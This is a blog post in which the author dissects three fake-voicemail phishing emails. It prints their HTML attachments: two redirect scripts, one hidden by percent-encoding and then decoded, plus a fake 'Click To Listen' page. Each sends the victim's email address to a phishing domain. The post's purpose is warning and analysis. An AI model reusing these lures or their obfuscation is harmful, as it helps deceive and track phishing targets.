You have a voicemail!

I’m sure that you are prevalent to getting scam emails just like I am. For me, there’s a class of them that I get one of per week, maybe two, that pretend to be a Voicemail. An urgent Voicemail. Possibly involving payments. Must be IMPORTANT!

Scam Voice Mail

Look: a voicemail!

Oooh, er. Must download that “Attachment” to listen to the secure caller message. It says “secure” so it must be legit, right? Mind you it’s weird that whoever set up our voicemail system didn’t know my name, sheesh. And we certainly don’t use Japanese email addresses to send out VM alerts.

But, hey, let’s download that HTML file, after all it’s only 544 bytes. Can’t be too dodgy, after all its name seems to reference AT&T:

<!DOCTYPE HTML>
<html lang="en-US">
    <head>
        <script type="text/javascript">
            window.location.href = "https://o-ko.online?e=julianb@devexpress.com"
        </script>
</html>

Oooh, nasty. All it does is to immediately redirect your browser to some dodgy domain and pass along the email address. Nope, not going to do it, not going there.

Another example voicemail scam email, perhaps trying a little harder than that crappy attempt, is one that has the following HTML file:

<script language="javascript">document.write(unescape('%3c%73%63%72
%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0d%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%69%64%66%61%63%65%2e%63%6f%2e%7a%61%2f%61%64%73%2f%73%61%66%65%2f%61%6e%56%73%61%57%46%75%59%6b%42%6b%5a%58%5a%6c%65%48%42%79%5a%58%4e%7a%4c%6d%4e%76%62%51%3d%3d%27%3b%22%2c%30%29%3b%0d%0a%3c%2f73%63%72%69%70%74%3e'));</script>

Oooh! Mind you, all we have here is a script block that writes a block of HTML to the current document. The HTML to be written is escaped, making it hard to read, so let’s, er, unescape it:

<script type="text/JavaScript">
      setTimeout("location.href = 'https://idface.co.za/ads/safe/anVsaWFuYkBkZXZleHByZXNzLmNvbQ==';",0);
</script>

Pretty much the same, redirect to a dodgy website in South Africa this time, passing along a unique string to identify me. For some reason that escapes (ha!) me, it uses a timeout of zero seconds.

Another one I got had a 7KB HTML attachment. Wowza! 7KB? Again it’s all escaped, requiring the call to unescape() it. This time it produced an actual page (badly written, but what the heck) to display in the browser. Within it is an embedded link resembling a button that goes to the dodgy site, passing along the email address.

<P>
  <FONT size=4>Dear julianb@devexpress.com ,</FONT>
</P>
<P>
  <FONT size=4>There is a new voicemail in mailbox 301:</FONT>
</P>
<P>
  <FONT size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; From:&nbsp;&nbsp; "OPTIMA ASSET"
    &lt;8435358761&gt;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Length: 0:30
    seconds<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Date:&nbsp;&nbsp; Tuesday, July 27, 2021</FONT>
</P>
<TD style="WHITE-SPACE: normal !important">
  <TABLE
    style="FONT-SIZE: 15px; FONT-FAMILY: arial, helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; MIN-WIDTH: 100%; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); font-variant-ligatures: normal; font-variant-caps: normal; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial"
    cellSpacing=0 cellPadding=0 width="100%">
    <TBODY>
      <TR>
        <TD style="WHITE-SPACE: normal !important">
          <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
            <TBODY>
              <TR>
                <TD style="WHITE-SPACE: normal !important" align=left>
                  <TABLE cellSpacing=0 cellPadding=0 border=0>
                    <TBODY>
                      <TR>
                        <TD style="WHITE-SPACE: normal !important; BACKGROUND-COLOR: rgb(255,0,0); border-radius: 3px"
                          bgColor=#ff0000><A
                            style="FONT-SIZE: 16px; TEXT-DECORATION: none; BORDER-TOP: rgb(255,0,0) 1px solid; FONT-FAMILY: arial, helvetica, sans-serif; BORDER-RIGHT: rgb(255,0,0) 1px solid; VERTICAL-ALIGN: baseline; BORDER-BOTTOM: rgb(255,0,0) 1px solid; COLOR: rgb(255,255,255); PADDING-BOTTOM: 10px; TEXT-ALIGN: left; PADDING-TOP: 10px; PADDING-LEFT: 10px; MARGIN: 0px; BORDER-LEFT: rgb(255,0,0) 1px solid; DISPLAY: block; PADDING-RIGHT: 10px; BACKGROUND-COLOR: rgb(255,0,0); font-stretch: inherit; border-radius: 3px"
                            href="https://auth.microauthonline.club?e=julianb@devexpress.com" rel="noopener noreferrer"
                            target=_blank data-linkindex="8" data-auth="NotApplicable">
                            <FONT size=4>Click To Listen</FONT>
                          </A></TD>
                      </TR>
                    </TBODY>
                  </TABLE>
                </TD>
              </TR>
            </TBODY>
          </TABLE>
        </TD>
      </TR>
    </TBODY>
  </TABLE><BR>
  <FONT size=1>2021 Intellectual Property. All Rights Reserved.</FONT>

So, the overriding piece of advice I have is: don’t open dodgy HTML files, especially from within scammy looking emails.

OMG!

Loading similar posts...   Loading links to posts on similar topics...

No Responses

Feel free to add a comment...

Leave a response

Note: some MarkDown is allowed, but HTML is not. Expand to show what's available.

  •  Emphasize with italics: surround word with underscores _emphasis_
  •  Emphasize strongly: surround word with double-asterisks **strong**
  •  Link: surround text with square brackets, url with parentheses [text](url)
  •  Inline code: surround text with backticks `IEnumerable`
  •  Unordered list: start each line with an asterisk, space * an item
  •  Ordered list: start each line with a digit, period, space 1. an item
  •  Insert code block: start each line with four spaces
  •  Insert blockquote: start each line with right-angle-bracket, space > Now is the time...
Preview of response